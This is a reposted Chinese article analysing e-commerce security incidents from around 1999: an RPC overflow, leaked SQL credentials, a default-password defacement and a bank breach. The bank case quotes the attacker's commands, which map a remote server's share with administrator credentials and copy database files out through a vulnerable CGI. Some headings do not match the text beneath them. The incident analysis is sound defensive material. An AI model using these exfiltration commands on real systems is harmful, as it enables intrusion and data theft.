电子商务安全案例分析(转)

电子商务安全案例分析

在考查“电子商务链”上每个逻辑链条时，为保证安全的电子商务所必须保护的资产包括客户机、在通信信道上传输的消息、WWW 和电子商务服务器(包括服务器端所有的硬件)。电影中商业间谍主要是窃听各种通信设备，如电话线和卫星通信线路。虽然电信通道是需要保护的主要的资产之一，但并不是计算机和电子商务安全所考虑的惟一因素。例如，如果通信连接是安全的，而客户机上有一个病毒，这个病毒就会污染要安全传输到WWW 或电子商务服务器上的信息，这时商务交易的安全就像客户机一样不安全了

对客户机的安全威胁

在可执行的HTML 编制的，WWW 内容出现前，页面是静态的。静态页面是以WWW 标准页面描述语言其作用只是显示内容并提供到其他页面的链接。在活动内容广泛应用后，这个状况就发生变化了。

1 .活动内容

该网站运行于Solaris2.5上，系统管理员经常发现网站的管理模块有不明用户进入，入侵者能用管理

员的帐号查看，修改用户数据，查看用户密码

。从6月以来不断有用户投诉密码被更改，邮箱邮件被别人收走。还有的栏目信息被入侵者修改，换成莫名其妙的内容，更猖狂的是，该入侵者居然公然加了一个自己的帐号，并将其设置为管理员。经本站安全技术人员C检查，其网站至少存在2个致命漏洞，一个中等程度的漏洞和若干个配置错误。其中一个致命漏洞在于RPC程序中的一个守护进程。该守护进程的漏洞在Internet上发布已经有半年，但管理员既没有对该进程的程序打补丁，也没有关掉该服务。实际上这个服务是没有必要打开的。这个守护进程中存在一个缓冲区溢出错误，并且有黑客针对该错误写了一段攻击程序，公布在黑客BBS上。该攻击程序通过缓冲区溢出错误可以使入侵者在这台机器上用任何身份执行任何指令。该溢出发生的时候这个守护进程程序报错，这表明入侵者的确是利用这个漏洞进入系统的。该网站上的另一个中等程度的漏洞是finger服务，该服务暴露了这台机器的用户名。本站安全技术人员通过修改系统初始化文件和修补漏洞的工作以后，有效地防止了以后同类现象发生。该网站从7月中开始运行到现在没有出现过有关安全的投诉.

1.借刀杀人，破坏某电子公司的数据库(2001年2月12日)

时间：1999年11月该网站运行于Windows NT 4.0上,web server为IIS4.0,补丁号为Service Pack5。该网站管理员在11月的某一天发现其web网站上的用户资料和电子配件数据库被入侵者完全删除!严重之处更在于该数据库没有备份，网站运行半年来积累的用户和资料全部丢失。系统管理员反复检查原因，通过web日志发现破坏者的调用web程序记录，确定了当时用户的IP是202.103.xxx.xxx(出于众所周知的原因这里隐藏了后两位)，而这个IP来自于某地一个ISP的一台代理服务器。这个202.103.xxx.xx 的服务器安装了Wingate的代理软件。破坏者浏览电子公司的网站是用该代理访问的。这件事情给电子公司带来的损失是很严重的，丢失了半年的工作成果。入侵者同时给202.103.xxx.xxx带来了麻烦，电子公司报了案，协查通报到了202.103.xxx.xxx这个ISP所在地的公安局。该代理服务器的系统管理员是本站一位技术人员F的朋友。F通过对受害者的服务器进行安全检查发现了原因。首先，其端口1433为开放，SQL数据库服务器允许远程管理访问;其次，其IIS服务器存在ASP的bug，允许任何用户查看ASP源代码，数据库管理员帐号sa和密码以明文的形式存在于ASP文件中。有了这两个条件，破坏者可以很容易地连上SQL数据库，以最高身份对数据库执行任意操作。对于该漏洞的补丁，请下载本站的ASP bug补

丁修复程序。

台湾黑客对某政府网站的攻击时间：1999年8月

该网站运行的系统是SunOS，版本比较旧。当时大陆黑客出于对李登辉"quot;两国论"quot;谬论的愤慨，为谴责李登辉的分裂行径，于8月份某日，一夜之间入侵了数十个台湾政府站点。台湾黑客采取了报复行动，替换了这个网站的首页。经本站技术人员P分析，在该系统上实际存在至少4个致命的弱点可以被黑客利用。其中有两个RPC守护进程存在缓冲区溢出漏洞，一个CGI程序也有溢出错误。对这些漏洞要采用比较特殊的攻击程序。但台湾黑客并没有利用这些比较高级的攻击技巧，而是从一个最简单的错误配置进入了系统。原来，其缺省帐号infomix的密码与用户名相同!这个用户的权限足以让台湾黑客对web 网站为所欲为。从这件事情可以看出，我们有部分系统管理员不具备最起码的安全素质。

案例四：东亚某银行时间：1999年12月

该网站为WindowsNT 4.0，是这个国家最大的银行之一。该网站BankServer实际上有两道安全防线，首先在其路由器的访问控制表中(ACL)做了严格的端口过滤限制，只允许对80、443、65300进行incoming访问，另一道防火墙为全世界市场份额最大的软件防火墙FW，在FW防火墙上除了端口访问控制外，还禁止了很多异常的、利用已知CGI bug的非法调用。在12月某日，该银行网站的系统管理员Ymouse(呢称)突然发现在任务列表中有一个杀不死的CMD.exe进程，而在BankServer系统上并没有与CMD.exe相关的服务。该系统管理员在一黑客聊天室向本站技术人员F求救。F认为这是一个典型的NT 系统已经遭受入侵的迹象。通过Email授权，F开始分析该系统的安全问题，从外部看，除WWW服务外，BankServer并没有向外开放任何有安全问题的服务。但F在该网站的上游路由器发现一个安全问题，允许入侵者获取该路由器的配置文件和破解密码。经过系统管理员Ymouse的再次授权确认，F仅用了3分钟，就获取了该路由器的访问密码;登录路由器后，经过复杂的分析发现，虽然该银行网站没有incoming的可疑通信，却发现BankServer正在向外连接着另一台NT服务器Wserver的139端口。通过进一步的分析，证实有人从BankServer登录到了Wserver的C盘。Wserver是一台韩国的NT服务器，不受任何安全保护的裸机。F对Wserver进行了一次简单的扫描，结果意外地发现Wserver的管理员帐号的密码极为简单，可以轻易获取对该系统的完全控制。更令人吃惊的是，在这台韩国的服务器的C盘上，保存着上面提到的东亚某银行的一个重要数据库文件!更多的文件正在从BankServer上往这台韩国的Wserver上传送!

至此问题已经有了初步的轮廓。入侵者通过某种手段(最可能是利用WWW服务的漏洞)，可以在BankServer上执行NT的shell指令。虽然入侵者不能直接登录BankServer的硬盘，但他入侵了另一台NT的Server，获取了该系统的管理员帐号。入侵者通过这台BankServer的shell指令(net use *

\\xxx.xxx.xxx.xxx\c$ passwd /user:"quot;administrator"quot;)，将Wserver的C盘映射成为了BankServer 上的一个盘符。然后，入侵者利用copy命令，将该系统上的重要文件往Wserver上传送。但是，既然BankServer上根本没有可以登录的入口，入侵者是如何浏览BankServer上的文件系统的?他又怎么知道哪些文件才是重要的数据文件?为了找到这个问题的答案，F请Ymouse检查了一下BankServer上的web 目录。Ymouse发现，在web目录下多了一个可疑的abc目录，目录中的文件全部为文本文件，分别为x1.txt、x2.txt、x3.txt......逐个检查这些文件发现，这些文件大部分是dir c:\"gt;x.txt 和dir c:\data"gt;x.txt 生成的结果。这些文件通过http://BankServer/abc/x.txt 的方式可以浏览。由此可见，入侵者逐个通过一些巧妙的shell指令，不仅实现了浏览系统重要文件，而且实现了创建文件、修改文件和把文件传送出去的目的。当然入侵者也可以删除系统上的文件。看起来他几乎可以做任何事情。

为了了解入侵者是如何获取系统shell的，F让Ymouse检查了最近三天的web访问日志，幸运的是，由于系统管理员在设置系统的时候多了一个心眼，把日志目录放在E盘上，而不是象缺省的那样放在c:\winnt\system32\logfiles下面。(入侵者删除了c:\winnt\system32\logfiles下面的所有文件)入侵者似乎并没有发现这些日志。当天日志显示，在http://BankServer/login/redir.exe 被多次调用。在调用参数的末尾，Ymouse发现了很多shell指令，其中就包括了copy c:\data\db1.dat h: ，其中h:盘就是韩国Wserver的C盘。这表明，入侵者正是利用redir.exe这个程序的漏洞，实现对系统的非法调用的。redir.exe是该银

行自行编写的CGI程序。